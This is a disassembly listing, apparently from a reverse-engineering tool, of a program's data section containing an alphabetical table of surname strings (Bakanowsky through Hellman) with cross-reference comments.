aBakanowsky db 'Bakanowsky',0 ; DATA XREF: .data:004454AC�o
align 4
aBaleja db 'Baleja',0 ; DATA XREF: .data:004454B0�o
align 4
aBallatori db 'Ballatori',0 ; DATA XREF: .data:004454B4�o
align 10h
aBallew db 'Ballew',0 ; DATA XREF: .data:004454B8�o
align 4
aBaltz db 'Baltz',0 ; DATA XREF: .data:004454BC�o
align 10h
aBanta db 'Banta',0 ; DATA XREF: .data:004454C0�o
align 4
aBarabesi db 'Barabesi',0 ; DATA XREF: .data:004454C4�o
align 4
aBarajas db 'Barajas',0 ; DATA XREF: .data:004454C8�o
aBaranczak db 'Baranczak',0 ; DATA XREF: .data:004454CC�o
align 4
aBaranowska db 'Baranowska',0 ; DATA XREF: .data:004454D0�o
align 4
aBarberi db 'Barberi',0 ; DATA XREF: .data:004454D4�o
aBarbetti db 'Barbetti',0 ; DATA XREF: .data:004454D8�o
align 4
aBarneson db 'Barneson',0 ; DATA XREF: .data:004454DC�o
align 4
aBarnett db 'Barnett',0 ; DATA XREF: .data:004454E0�o
aBarriola db 'Barriola',0 ; DATA XREF: .data:004454E4�o
align 4
aBarry db 'Barry',0 ; DATA XREF: .data:004454E8�o
align 10h
aBartholomew db 'Bartholomew',0 ; DATA XREF: .data:004454EC�o
aBartolome db 'Bartolome',0 ; DATA XREF: .data:004454F0�o
align 4
aBartoo db 'Bartoo',0 ; DATA XREF: .data:004454F4�o
align 10h
aBasavappa db 'Basavappa',0 ; DATA XREF: .data:004454F8�o
align 4
aBashevis db 'Bashevis',0 ; DATA XREF: .data:004454FC�o
align 4
aBatchelder db 'Batchelder',0 ; DATA XREF: .data:00445500�o
align 4
aBaumiller db 'Baumiller',0 ; DATA XREF: .data:00445504�o
align 10h
aBayles db 'Bayles',0 ; DATA XREF: .data:00445508�o
align 4
aBayo db 'Bayo',0 ; DATA XREF: .data:0044550C�o
align 10h
aBeacon db 'Beacon',0 ; DATA XREF: .data:00445510�o
align 4
aBeal db 'Beal',0 ; DATA XREF: .data:00445514�o
align 10h
aBean db 'Bean',0 ; DATA XREF: .data:00445518�o
align 4
aBeckman db 'Beckman',0 ; DATA XREF: .data:0044551C�o
aBeder db 'Beder',0 ; DATA XREF: .data:00445520�o
align 4
aBedford db 'Bedford',0 ; DATA XREF: .data:00445524�o
aBehenna db 'Behenna',0 ; DATA XREF: .data:00445528�o
aBelanger db 'Belanger',0 ; DATA XREF: .data:0044552C�o
align 4
aBelaoussof db 'Belaoussof',0 ; DATA XREF: .data:00445530�o
align 10h
aBelfer db 'Belfer',0 ; DATA XREF: .data:00445534�o
align 4
aBelinCollart db 'Belin-Collart',0 ; DATA XREF: .data:00445538�o
align 4
aBellavance db 'Bellavance',0 ; DATA XREF: .data:0044553C�o
align 4
aBellhouse db 'Bellhouse',0 ; DATA XREF: .data:00445540�o
align 10h
aBellini db 'Bellini',0 ; DATA XREF: .data:00445544�o
aBelloc db 'Belloc',0 ; DATA XREF: .data:00445548�o
align 10h
aBenedictDye db 'Benedict-Dye',0 ; DATA XREF: .data:0044554C�o
align 10h
aBergson db 'Bergson',0 ; DATA XREF: .data:00445550�o
aBerkeJenkins db 'Berke-Jenkins',0 ; DATA XREF: .data:00445554�o
align 4
aBernardo db 'Bernardo',0 ; DATA XREF: .data:00445558�o
align 4
aBernassola db 'Bernassola',0 ; DATA XREF: .data:0044555C�o
align 10h
aBernston db 'Bernston',0 ; DATA XREF: .data:00445560�o
align 4
aBerrizbeitia db 'Berrizbeitia',0 ; DATA XREF: .data:00445564�o
align 4
aBetti db 'Betti',0 ; DATA XREF: .data:00445568�o
align 4
aBeynart db 'Beynart',0 ; DATA XREF: .data:0044556C�o
aBiagioli db 'Biagioli',0 ; DATA XREF: .data:00445570�o
align 4
aBickel db 'Bickel',0 ; DATA XREF: .data:00445574�o
align 10h
aBinion db 'Binion',0 ; DATA XREF: .data:00445578�o
align 4
aBir db 'Bir',0 ; DATA XREF: .data:0044557C�o
aBisema db 'Bisema',0 ; DATA XREF: .data:00445580�o
align 4
aBisho db 'Bisho',0 ; DATA XREF: .data:00445584�o
align 4
aBlackbourn db 'Blackbourn',0 ; DATA XREF: .data:00445588�o
align 4
aBlackwell db 'Blackwell',0 ; DATA XREF: .data:0044558C�o
align 4
aBlagg db 'Blagg',0 ; DATA XREF: .data:00445590�o
align 4
aBlakemore db 'Blakemore',0 ; DATA XREF: .data:00445594�o
align 4
aBlanke db 'Blanke',0 ; DATA XREF: .data:00445598�o
align 10h
aBliss db 'Bliss',0 ; DATA XREF: .data:0044559C�o
align 4
aBlizard db 'Blizard',0 ; DATA XREF: .data:004455A0�o
aBloch db 'Bloch',0 ; DATA XREF: .data:004455A4�o
align 4
aBloembergen db 'Bloembergen',0 ; DATA XREF: .data:004455A8�o
aBloemhof db 'Bloemhof',0 ; DATA XREF: .data:004455AC�o
align 10h
aBloxham db 'Bloxham',0 ; DATA XREF: .data:004455B0�o
aBlyth db 'Blyth',0 ; DATA XREF: .data:004455B4�o
align 10h
aBolger db 'Bolger',0 ; DATA XREF: .data:004455B8�o
align 4
aBolick db 'Bolick',0 ; DATA XREF: .data:004455BC�o
align 10h
aBollinger db 'Bollinger',0 ; DATA XREF: .data:004455C0�o
align 4
aBologna db 'Bologna',0 ; DATA XREF: .data:004455C4�o
aBoner db 'Boner',0 ; DATA XREF: .data:004455C8�o
align 4
aBonham db 'Bonham',0 ; DATA XREF: .data:004455CC�o
align 4
aBoniface db 'Boniface',0 ; DATA XREF: .data:004455D0�o
align 10h
aBontempo db 'Bontempo',0 ; DATA XREF: .data:004455D4�o
align 4
aBook db 'Book',0 ; DATA XREF: .data:004455D8�o
align 4
aBookbinder db 'Bookbinder',0 ; DATA XREF: .data:004455DC�o
align 10h
aBoone db 'Boone',0 ; DATA XREF: .data:004455E0�o
align 4
aBoorstin db 'Boorstin',0 ; DATA XREF: .data:004455E4�o
align 4
aBorack db 'Borack',0 ; DATA XREF: .data:004455E8�o
align 4
aBorden db 'Borden',0 ; DATA XREF: .data:004455EC�o
align 4
aBossi db 'Bossi',0 ; DATA XREF: .data:004455F0�o
align 4
aBothman db 'Bothman',0 ; DATA XREF: .data:004455F4�o
aBotosh db 'Botosh',0 ; DATA XREF: .data:004455F8�o
align 4
aBoudin db 'Boudin',0 ; DATA XREF: .data:004455FC�o
align 4
aBoudrot db 'Boudrot',0 ; DATA XREF: .data:00445600�o
aBourneuf db 'Bourneuf',0 ; DATA XREF: .data:00445604�o
align 4
aBowers db 'Bowers',0 ; DATA XREF: .data:00445608�o
align 10h
aBoxer db 'Boxer',0 ; DATA XREF: .data:0044560C�o
align 4
aBoyajian db 'Boyajian',0 ; DATA XREF: .data:00445610�o
align 4
aBoyes db 'Boyes',0 ; DATA XREF: .data:00445614�o
align 4
aBoyland db 'Boyland',0 ; DATA XREF: .data:00445618�o
aBoym db 'Boym',0 ; DATA XREF: .data:0044561C�o
align 4
aBoyne db 'Boyne',0 ; DATA XREF: .data:00445620�o
align 4
aBracalente db 'Bracalente',0 ; DATA XREF: .data:00445624�o
align 10h
aBradac db 'Bradac',0 ; DATA XREF: .data:00445628�o
align 4
aBradach db 'Bradach',0 ; DATA XREF: .data:0044562C�o
aBrecht db 'Brecht',0 ; DATA XREF: .data:00445630�o
align 4
aBreed db 'Breed',0 ; DATA XREF: .data:00445634�o
align 10h
aBrenan db 'Brenan',0 ; DATA XREF: .data:00445638�o
align 4
aBrennan db 'Brennan',0 ; DATA XREF: .data:0044563C�o
aBrewer db 'Brewer',0 ; DATA XREF: .data:00445640�o
align 4
aBrewer_0 db 'Brewer',0 ; DATA XREF: .data:00445644�o
align 10h
aBridgeman db 'Bridgeman',0 ; DATA XREF: .data:00445648�o
align 4
aBridges db 'Bridges',0 ; DATA XREF: .data:0044564C�o
aBrinton db 'Brinton',0 ; DATA XREF: .data:00445650�o
aBritz db 'Britz',0 ; DATA XREF: .data:00445654�o
align 4
aBroca db 'Broca',0 ; DATA XREF: .data:00445658�o
align 4
aBrook db 'Brook',0 ; DATA XREF: .data:0044565C�o
align 4
aBrzycki db 'Brzycki',0 ; DATA XREF: .data:00445660�o
aBuchan db 'Buchan',0 ; DATA XREF: .data:00445664�o
align 4
aBudding db 'Budding',0 ; DATA XREF: .data:00445668�o
aBullard db 'Bullard',0 ; DATA XREF: .data:0044566C�o
aBunton db 'Bunton',0 ; DATA XREF: .data:00445670�o
align 4
aBurden db 'Burden',0 ; DATA XREF: .data:00445674�o
align 4
aBurdzy db 'Burdzy',0 ; DATA XREF: .data:00445678�o
align 4
aBurke db 'Burke',0 ; DATA XREF: .data:0044567C�o
align 4
aBurridge db 'Burridge',0 ; DATA XREF: .data:00445680�o
align 10h
aBusetta db 'Busetta',0 ; DATA XREF: .data:00445684�o
aByatt db 'Byatt',0 ; DATA XREF: .data:00445688�o
align 10h
aByerly db 'Byerly',0 ; DATA XREF: .data:0044568C�o
align 4
aByrd db 'Byrd',0 ; DATA XREF: .data:00445690�o
align 10h
aCage db 'Cage',0 ; DATA XREF: .data:00445694�o
align 4
aCalnan db 'Calnan',0 ; DATA XREF: .data:00445698�o
align 10h
aCammelli db 'Cammelli',0 ; DATA XREF: .data:0044569C�o
align 4
aCammilleri db 'Cammilleri',0 ; DATA XREF: .data:004456A0�o
align 4
aCanley db 'Canley',0 ; DATA XREF: .data:004456A4�o
align 10h
aCapanni db 'Capanni',0 ; DATA XREF: .data:004456A8�o
aCaperton db 'Caperton',0 ; DATA XREF: .data:004456AC�o
align 4
aCapocaccia db 'Capocaccia',0 ; DATA XREF: .data:004456B0�o
align 10h
aCapodilupo db 'Capodilupo',0 ; DATA XREF: .data:004456B4�o
align 4
aCappuccio db 'Cappuccio',0 ; DATA XREF: .data:004456B8�o
align 4
aCapursi db 'Capursi',0 ; DATA XREF: .data:004456BC�o
aCaratozzolo db 'Caratozzolo',0 ; DATA XREF: .data:004456C0�o
aCarayannopoulo db 'Carayannopoulos',0 ; DATA XREF: .data:004456C4�o
aCarlin db 'Carlin',0 ; DATA XREF: .data:004456C8�o
align 4
aCarlos db 'Carlos',0 ; DATA XREF: .data:004456CC�o
align 4
aCarlyle db 'Carlyle',0 ; DATA XREF: .data:004456D0�o
aCarmichael db 'Carmichael',0 ; DATA XREF: .data:004456D4�o
align 10h
aCaroti db 'Caroti',0 ; DATA XREF: .data:004456D8�o
align 4
aCarper db 'Carper',0 ; DATA XREF: .data:004456DC�o
align 10h
aCartmill db 'Cartmill',0 ; DATA XREF: .data:004456E0�o
align 4
aCascio db 'Cascio',0 ; DATA XREF: .data:004456E4�o
align 4
aCase db 'Case',0 ; DATA XREF: .data:004456E8�o
align 4
aCaspar db 'Caspar',0 ; DATA XREF: .data:004456EC�o
align 4
aCastelda db 'Castelda',0 ; DATA XREF: .data:004456F0�o
align 10h
aCavanagh db 'Cavanagh',0 ; DATA XREF: .data:004456F4�o
align 4
aCavell db 'Cavell',0 ; DATA XREF: .data:004456F8�o
align 4
aCeniceros db 'Ceniceros',0 ; DATA XREF: .data:004456FC�o
align 10h
aCerioli db 'Cerioli',0 ; DATA XREF: .data:00445700�o
aChapman db 'Chapman',0 ; DATA XREF: .data:00445704�o
aCharles db 'Charles',0 ; DATA XREF: .data:00445708�o
aCheang db 'Cheang',0 ; DATA XREF: .data:0044570C�o
align 10h
aCherry db 'Cherry',0 ; DATA XREF: .data:00445710�o
align 4
aChervinsky db 'Chervinsky',0 ; DATA XREF: .data:00445714�o
align 4
aChiassino db 'Chiassino',0 ; DATA XREF: .data:00445718�o
align 10h
aChien db 'Chien',0 ; DATA XREF: .data:0044571C�o
align 4
aChildress db 'Childress',0 ; DATA XREF: .data:00445720�o
align 4
aChilds db 'Childs',0 ; DATA XREF: .data:00445724�o
align 4
aChinipardaz db 'Chinipardaz',0 ; DATA XREF: .data:00445728�o
aChinman db 'Chinman',0 ; DATA XREF: .data:0044572C�o
aChristenson db 'Christenson',0 ; DATA XREF: .data:00445730�o
aChristian db 'Christian',0 ; DATA XREF: .data:00445734�o
align 4
aChristiano db 'Christiano',0 ; DATA XREF: .data:00445738�o
align 4
aChristie db 'Christie',0 ; DATA XREF: .data:0044573C�o
align 10h
aChristopher db 'Christopher',0 ; DATA XREF: .data:00445740�o
aChu db 'Chu',0 ; DATA XREF: .data:00445744�o
aChupasko db 'Chupasko',0 ; DATA XREF: .data:00445748�o
align 4
aChurch db 'Church',0 ; DATA XREF: .data:0044574C�o
align 4
aCiampaglia db 'Ciampaglia',0 ; DATA XREF: .data:off_445750�o
align 10h
aCicero db 'Cicero',0 ; DATA XREF: .data:00445754�o
align 4
aCifarelli db 'Cifarelli',0 ; DATA XREF: .data:00445758�o
align 4
aClaffey db 'Claffey',0 ; DATA XREF: .data:0044575C�o
aClancy db 'Clancy',0 ; DATA XREF: .data:00445760�o
align 4
aClark db 'Clark',0 ; DATA XREF: .data:00445764�o
align 4
aClement db 'Clement',0 ; DATA XREF: .data:00445768�o
aClifton db 'Clifton',0 ; DATA XREF: .data:0044576C�o
aClow db 'Clow',0 ; DATA XREF: .data:00445770�o
align 4
aCoblenz db 'Coblenz',0 ; DATA XREF: .data:00445774�o
aCoito db 'Coito',0 ; DATA XREF: .data:00445778�o
align 4
aColdren db 'Coldren',0 ; DATA XREF: .data:0044577C�o
aColella db 'Colella',0 ; DATA XREF: .data:00445780�o
aCollard db 'Collard',0 ; DATA XREF: .data:00445784�o
aCollis db 'Collis',0 ; DATA XREF: .data:00445788�o
align 4
aCompton db 'Compton',0 ; DATA XREF: .data:0044578C�o
aCompton_0 db 'Compton',0 ; DATA XREF: .data:00445790�o
aComstock db 'Comstock',0 ; DATA XREF: .data:00445794�o
align 10h
aConcino db 'Concino',0 ; DATA XREF: .data:00445798�o
aCondodina db 'Condodina',0 ; DATA XREF: .data:0044579C�o
align 4
aConnors db 'Connors',0 ; DATA XREF: .data:004457A0�o
aCorey db 'Corey',0 ; DATA XREF: .data:004457A4�o
align 4
aCornish db 'Cornish',0 ; DATA XREF: .data:004457A8�o
aCosmides db 'Cosmides',0 ; DATA XREF: .data:004457AC�o
align 4
aCounter db 'Counter',0 ; DATA XREF: .data:004457B0�o
aCoutaux db 'Coutaux',0 ; DATA XREF: .data:004457B4�o
aCrawford db 'Crawford',0 ; DATA XREF: .data:004457B8�o
align 4
aCrocker db 'Crocker',0 ; DATA XREF: .data:004457BC�o
aCroshaw db 'Croshaw',0 ; DATA XREF: .data:004457C0�o
aCroxen db 'Croxen',0 ; DATA XREF: .data:004457C4�o
align 4
aCroxton db 'Croxton',0 ; DATA XREF: .data:004457C8�o
aCui db 'Cui',0 ; DATA XREF: .data:004457CC�o
aCurrier db 'Currier',0 ; DATA XREF: .data:004457D0�o
aCutler db 'Cutler',0 ; DATA XREF: .data:004457D4�o
align 4
aCvek db 'Cvek',0 ; DATA XREF: .data:004457D8�o
align 10h
aCyders db 'Cyders',0 ; DATA XREF: .data:004457DC�o
align 4
aDasilva db 'daSilva',0 ; DATA XREF: .data:004457E0�o
aDaldalian db 'Daldalian',0 ; DATA XREF: .data:004457E4�o
align 4
aDaly db 'Daly',0 ; DATA XREF: .data:004457E8�o
align 4
aDAmbra db 'D',27h,'Ambra',0 ; DATA XREF: .data:004457EC�o
aDanieli db 'Danieli',0 ; DATA XREF: .data:004457F0�o
aDante db 'Dante',0 ; DATA XREF: .data:004457F4�o
align 4
aDapice db 'Dapice',0 ; DATA XREF: .data:004457F8�o
align 4
aDArcangelo db 'D',27h,'arcangelo',0 ; DATA XREF: .data:004457FC�o
aDas db 'Das',0 ; DATA XREF: .data:00445800�o
aDasgupta db 'Dasgupta',0 ; DATA XREF: .data:00445804�o
align 10h
aDaskalu db 'Daskalu',0 ; DATA XREF: .data:00445808�o
aDavid db 'David',0 ; DATA XREF: .data:0044580C�o
align 10h
aDawkins db 'Dawkins',0 ; DATA XREF: .data:00445810�o
aDegennaro db 'DeGennaro',0 ; DATA XREF: .data:00445814�o
align 4
aDelapena db 'DeLaPena',0 ; DATA XREF: .data:00445818�o
align 10h
aDelEnclos db 'del',27h,'Enclos',0 ; DATA XREF: .data:0044581C�o
align 4
aDerousse db 'deRousse',0 ; DATA XREF: .data:00445820�o
align 4
aDebroff db 'Debroff',0 ; DATA XREF: .data:00445824�o
aDees db 'Dees',0 ; DATA XREF: .data:00445828�o
align 4
aDefeciani db 'Defeciani',0 ; DATA XREF: .data:0044582C�o
align 4
aDelattre db 'Delattre',0 ; DATA XREF: .data:00445830�o
align 10h
aDeleonRendon db 'Deleon-Rendon',0 ; DATA XREF: .data:00445834�o
align 10h
aDelger db 'Delger',0 ; DATA XREF: .data:00445838�o
align 4
aDellAcqua db 'Dell',27h,'acqua',0 ; DATA XREF: .data:0044583C�o
align 4
aDeming db 'Deming',0 ; DATA XREF: .data:00445840�o
align 4
aDempster db 'Dempster',0 ; DATA XREF: .data:00445844�o
align 4
aDemusz db 'Demusz',0 ; DATA XREF: .data:00445848�o
align 10h
aDenault db 'Denault',0 ; DATA XREF: .data:0044584C�o
aDenham db 'Denham',0 ; DATA XREF: .data:00445850�o
align 10h
aDenison db 'Denison',0 ; DATA XREF: .data:00445854�o
aDesombre db 'Desombre',0 ; DATA XREF: .data:00445858�o
align 4
aDeutsch db 'Deutsch',0 ; DATA XREF: .data:0044585C�o
aDFini db 'D',27h,'fini',0 ; DATA XREF: .data:00445860�o
align 4
aDicks db 'Dicks',0 ; DATA XREF: .data:00445864�o
align 4
aDiefenbach db 'Diefenbach',0 ; DATA XREF: .data:00445868�o
align 4
aDifabio db 'Difabio',0 ; DATA XREF: .data:0044586C�o
aDifronzo db 'Difronzo',0 ; DATA XREF: .data:00445870�o
align 4
aDilworth db 'Dilworth',0 ; DATA XREF: .data:00445874�o
align 4
aDionysius db 'Dionysius',0 ; DATA XREF: .data:00445878�o
align 4
aDirksen db 'Dirksen',0 ; DATA XREF: .data:0044587C�o
aDockery db 'Dockery',0 ; DATA XREF: .data:00445880�o
aDoherty db 'Doherty',0 ; DATA XREF: .data:00445884�o
aDonahue db 'Donahue',0 ; DATA XREF: .data:00445888�o
aDonner db 'Donner',0 ; DATA XREF: .data:0044588C�o
align 4
aDoonan db 'Doonan',0 ; DATA XREF: .data:00445890�o
align 4
aDore db 'Dore',0 ; DATA XREF: .data:00445894�o
align 4
aDorf db 'Dorf',0 ; DATA XREF: .data:00445898�o
align 4
aDosi db 'Dosi',0 ; DATA XREF: .data:0044589C�o
align 4
aDoty db 'Doty',0 ; DATA XREF: .data:004458A0�o
align 4
aDoug db 'Doug',0 ; DATA XREF: .data:004458A4�o
align 4
aDowsland db 'Dowsland',0 ; DATA XREF: .data:004458A8�o
align 4
aDrinker db 'Drinker',0 ; DATA XREF: .data:004458AC�o
aDSouza db 'D',27h,'souza',0 ; DATA XREF: .data:004458B0�o
aDuffin db 'Duffin',0 ; DATA XREF: .data:004458B4�o
align 10h
aDurrett db 'Durrett',0 ; DATA XREF: .data:004458B8�o
aDussault db 'Dussault',0 ; DATA XREF: .data:004458BC�o
align 4
aDwyer db 'Dwyer',0 ; DATA XREF: .data:004458C0�o
align 4
aEardley db 'Eardley',0 ; DATA XREF: .data:004458C4�o
aEbeling db 'Ebeling',0 ; DATA XREF: .data:004458C8�o
aEckel db 'Eckel',0 ; DATA XREF: .data:004458CC�o
align 4
aEdley db 'Edley',0 ; DATA XREF: .data:004458D0�o
align 4
aEdner db 'Edner',0 ; DATA XREF: .data:004458D4�o
align 4
aEdward db 'Edward',0 ; DATA XREF: .data:004458D8�o
align 4
aEickenhorst db 'Eickenhorst',0 ; DATA XREF: .data:004458DC�o
aEliasson db 'Eliasson',0 ; DATA XREF: .data:004458E0�o
align 4
aElmendorf db 'Elmendorf',0 ; DATA XREF: .data:004458E4�o
align 10h
aElmerick db 'Elmerick',0 ; DATA XREF: .data:004458E8�o
align 4
aElvis db 'Elvis',0 ; DATA XREF: .data:004458EC�o
align 4
aEncinas db 'Encinas',0 ; DATA XREF: .data:004458F0�o
aEnyeart db 'Enyeart',0 ; DATA XREF: .data:004458F4�o
aEppling db 'Eppling',0 ; DATA XREF: .data:004458F8�o
aErbach db 'Erbach',0 ; DATA XREF: .data:004458FC�o
align 4
aErdman db 'Erdman',0 ; DATA XREF: .data:00445900�o
align 4
aErdos db 'Erdos',0 ; DATA XREF: .data:00445904�o
align 4
aErez db 'Erez',0 ; DATA XREF: .data:00445908�o
align 4
aEspinoza db 'Espinoza',0 ; DATA XREF: .data:0044590C�o
align 4
aEstes db 'Estes',0 ; DATA XREF: .data:00445910�o
align 10h
aEtter db 'Etter',0 ; DATA XREF: .data:00445914�o
align 4
aEuripides db 'Euripides',0 ; DATA XREF: .data:00445918�o
align 4
aEverett db 'Everett',0 ; DATA XREF: .data:0044591C�o
aFabbris db 'Fabbris',0 ; DATA XREF: .data:00445920�o
aFagan db 'Fagan',0 ; DATA XREF: .data:00445924�o
align 4
aFaioes db 'Faioes',0 ; DATA XREF: .data:00445928�o
align 4
aFalcoAcosta db 'Falco-Acosta',0 ; DATA XREF: .data:0044592C�o
align 4
aFalorsi db 'Falorsi',0 ; DATA XREF: .data:00445930�o
aFaris db 'Faris',0 ; DATA XREF: .data:00445934�o
align 4
aFarone db 'Farone',0 ; DATA XREF: .data:00445938�o
align 4
aFarren db 'Farren',0 ; DATA XREF: .data:0044593C�o
align 4
aFasso db 'Fasso',27h,0 ; DATA XREF: .data:00445940�o
align 4
aFates db 'Fates',0 ; DATA XREF: .data:00445944�o
align 4
aFeigenbaum db 'Feigenbaum',0 ; DATA XREF: .data:00445948�o
align 10h
aFejzo db 'Fejzo',0 ; DATA XREF: .data:0044594C�o
align 4
aFeldman db 'Feldman',0 ; DATA XREF: .data:00445950�o
aFernald db 'Fernald',0 ; DATA XREF: .data:00445954�o
aFernandes db 'Fernandes',0 ; DATA XREF: .data:00445958�o
align 4
aFerrante db 'Ferrante',0 ; DATA XREF: .data:0044595C�o
align 10h
aFerriell db 'Ferriell',0 ; DATA XREF: .data:00445960�o
align 4
aFeuer db 'Feuer',0 ; DATA XREF: .data:00445964�o
align 4
aFido db 'Fido',0 ; DATA XREF: .data:00445968�o
align 4
aField db 'Field',0 ; DATA XREF: .data:0044596C�o
align 4
aFink db 'Fink',0 ; DATA XREF: .data:00445970�o
align 4
aFinkelstein db 'Finkelstein',0 ; DATA XREF: .data:00445974�o
aFinnegan db 'Finnegan',0 ; DATA XREF: .data:00445978�o
align 4
aFiorina db 'Fiorina',0 ; DATA XREF: .data:0044597C�o
aFisk db 'Fisk',0 ; DATA XREF: .data:00445980�o
align 4
aFitzmaurice db 'Fitzmaurice',0 ; DATA XREF: .data:00445984�o
aFlier db 'Flier',0 ; DATA XREF: .data:00445988�o
align 4
aFlores db 'Flores',0 ; DATA XREF: .data:0044598C�o
align 10h
aFolks db 'Folks',0 ; DATA XREF: .data:00445990�o
align 4
aForester db 'Forester',0 ; DATA XREF: .data:00445994�o
align 4
aFortes db 'Fortes',0 ; DATA XREF: .data:00445998�o
align 4
aFortier db 'Fortier',0 ; DATA XREF: .data:0044599C�o
aFossey db 'Fossey',0 ; DATA XREF: .data:004459A0�o
align 4
aFossi db 'Fossi',0 ; DATA XREF: .data:004459A4�o
align 4
aFrancisco db 'Francisco',0 ; DATA XREF: .data:004459A8�o
align 10h
aFranklinKenea db 'Franklin-Kenea',0 ; DATA XREF: .data:004459AC�o
align 10h
aFranz db 'Franz',0 ; DATA XREF: .data:004459B0�o
align 4
aFrazierDavis db 'Frazier-Davis',0 ; DATA XREF: .data:004459B4�o
align 4
aFreid db 'Freid',0 ; DATA XREF: .data:004459B8�o
align 10h
aFreundlich db 'Freundlich',0 ; DATA XREF: .data:004459BC�o
align 4
aFried db 'Fried',0 ; DATA XREF: .data:004459C0�o
align 4
aFriedland db 'Friedland',0 ; DATA XREF: .data:004459C4�o
align 10h
aFrisken db 'Frisken',0 ; DATA XREF: .data:004459C8�o
aFrowiss db 'Frowiss',0 ; DATA XREF: .data:004459CC�o
aFryberger db 'Fryberger',0 ; DATA XREF: .data:004459D0�o
align 4
aFrye db 'Frye',0 ; DATA XREF: .data:004459D4�o
align 4
aFujiiAbe db 'Fujii-Abe',0 ; DATA XREF: .data:004459D8�o
align 10h
aFuller db 'Fuller',0 ; DATA XREF: .data:004459DC�o
align 4
aFurth db 'Furth',0 ; DATA XREF: .data:004459E0�o
align 10h
aFusaro db 'Fusaro',0 ; DATA XREF: .data:004459E4�o
align 4
aGabrielli db 'Gabrielli',0 ; DATA XREF: .data:004459E8�o
align 4
aGaggiotti db 'Gaggiotti',0 ; DATA XREF: .data:004459EC�o
align 10h
aGaleotti db 'Galeotti',0 ; DATA XREF: .data:004459F0�o
align 4
aGalwey db 'Galwey',0 ; DATA XREF: .data:004459F4�o
align 4
aGambini db 'Gambini',0 ; DATA XREF: .data:004459F8�o
aGarfield db 'Garfield',0 ; DATA XREF: .data:004459FC�o
align 4
aGarman db 'Garman',0 ; DATA XREF: .data:00445A00�o
align 10h
aGaronna db 'Garonna',0 ; DATA XREF: .data:00445A04�o
aGeller db 'Geller',0 ; DATA XREF: .data:00445A08�o
align 10h
aGemberling db 'Gemberling',0 ; DATA XREF: .data:00445A0C�o
align 4
aGeorgi db 'Georgi',0 ; DATA XREF: .data:00445A10�o
align 4
aGerrett db 'Gerrett',0 ; DATA XREF: .data:00445A14�o
aGhorai db 'Ghorai',0 ; DATA XREF: .data:00445A18�o
align 4
aGibbens db 'Gibbens',0 ; DATA XREF: .data:00445A1C�o
aGibson db 'Gibson',0 ; DATA XREF: .data:00445A20�o
align 4
aGilbert db 'Gilbert',0 ; DATA XREF: .data:00445A24�o
aGili db 'Gili',0 ; DATA XREF: .data:00445A28�o
align 4
aGill db 'Gill',0 ; DATA XREF: .data:00445A2C�o
align 4
aGillispie db 'Gillispie',0 ; DATA XREF: .data:00445A30�o
align 4
aGist db 'Gist',0 ; DATA XREF: .data:00445A34�o
align 10h
aGleason db 'Gleason',0 ; DATA XREF: .data:00445A38�o
aGlegg db 'Glegg',0 ; DATA XREF: .data:00445A3C�o
align 10h
aGlendon db 'Glendon',0 ; DATA XREF: .data:00445A40�o
aGoldfarb db 'Goldfarb',0 ; DATA XREF: .data:00445A44�o
align 4
aGoncalves db 'Goncalves',0 ; DATA XREF: .data:00445A48�o
align 10h
aGood db 'Good',0 ; DATA XREF: .data:00445A4C�o
align 4
aGoodearl db 'Goodearl',0 ; DATA XREF: .data:00445A50�o
align 4
aGoody db 'Goody',0 ; DATA XREF: .data:00445A54�o
align 4
aGozzi db 'Gozzi',0 ; DATA XREF: .data:00445A58�o
align 4
aGravell db 'Gravell',0 ; DATA XREF: .data:00445A5C�o
aGreenberg db 'Greenberg',0 ; DATA XREF: .data:00445A60�o
align 4
aGreenfeld db 'Greenfeld',0 ; DATA XREF: .data:00445A64�o
align 4
aGriffiths db 'Griffiths',0 ; DATA XREF: .data:00445A68�o
align 10h
aGrigoletto db 'Grigoletto',0 ; DATA XREF: .data:00445A6C�o
align 4
aGrummell db 'Grummell',0 ; DATA XREF: .data:00445A70�o
align 4
aGruner db 'Gruner',0 ; DATA XREF: .data:00445A74�o
align 10h
aGruppe db 'Gruppe',0 ; DATA XREF: .data:00445A78�o
align 4
aGuenthart db 'Guenthart',0 ; DATA XREF: .data:00445A7C�o
align 4
aGunn db 'Gunn',0 ; DATA XREF: .data:00445A80�o
align 4
aGuo db 'Guo',0 ; DATA XREF: .data:00445A84�o
aHa db 'Ha',0 ; DATA XREF: .data:00445A88�o
align 4
aHaar db 'Haar',0 ; DATA XREF: .data:00445A8C�o
align 4
aHackman db 'Hackman',0 ; DATA XREF: .data:00445A90�o
aHackshaw db 'Hackshaw',0 ; DATA XREF: .data:00445A94�o
align 10h
aHaley db 'Haley',0 ; DATA XREF: .data:00445A98�o
align 4
aHalkias db 'Halkias',0 ; DATA XREF: .data:00445A9C�o
aHallowell db 'Hallowell',0 ; DATA XREF: .data:00445AA0�o
align 4
aHalpert db 'Halpert',0 ; DATA XREF: .data:00445AA4�o
aHambarzumjan db 'Hambarzumjan',0 ; DATA XREF: .data:00445AA8�o
align 4
aHamer db 'Hamer',0 ; DATA XREF: .data:00445AAC�o
align 4
aHammerness db 'Hammerness',0 ; DATA XREF: .data:00445AB0�o
align 4
aHand db 'Hand',0 ; DATA XREF: .data:00445AB4�o
align 10h
aHanssen db 'Hanssen',0 ; DATA XREF: .data:00445AB8�o
aHarding db 'Harding',0 ; DATA XREF: .data:00445ABC�o
aHargraves db 'Hargraves',0 ; DATA XREF: .data:00445AC0�o
align 4
aHarlow db 'Harlow',0 ; DATA XREF: .data:00445AC4�o
align 4
aHarrigan db 'Harrigan',0 ; DATA XREF: .data:00445AC8�o
align 10h
aHartman db 'Hartman',0 ; DATA XREF: .data:00445ACC�o
aHartmann db 'Hartmann',0 ; DATA XREF: .data:00445AD0�o
align 4
aHartnett db 'Hartnett',0 ; DATA XREF: .data:00445AD4�o
align 10h
aHarwell db 'Harwell',0 ; DATA XREF: .data:00445AD8�o
aHaviaras db 'Haviaras',0 ; DATA XREF: .data:00445ADC�o
align 4
aHawkes db 'Hawkes',0 ; DATA XREF: .data:00445AE0�o
align 4
aHayes db 'Hayes',0 ; DATA XREF: .data:00445AE4�o
align 4
aHaynes db 'Haynes',0 ; DATA XREF: .data:00445AE8�o
align 4
aHazlewood db 'Hazlewood',0 ; DATA XREF: .data:00445AEC�o
align 4
aHeermans db 'Heermans',0 ; DATA XREF: .data:00445AF0�o
align 4
aHeft db 'Heft',0 ; DATA XREF: .data:00445AF4�o
align 4
aHeiland db 'Heiland',0 ; DATA XREF: .data:00445AF8�o
aHellman db 'Hellman',0 ; DATA XREF: .data:00445AFC�o
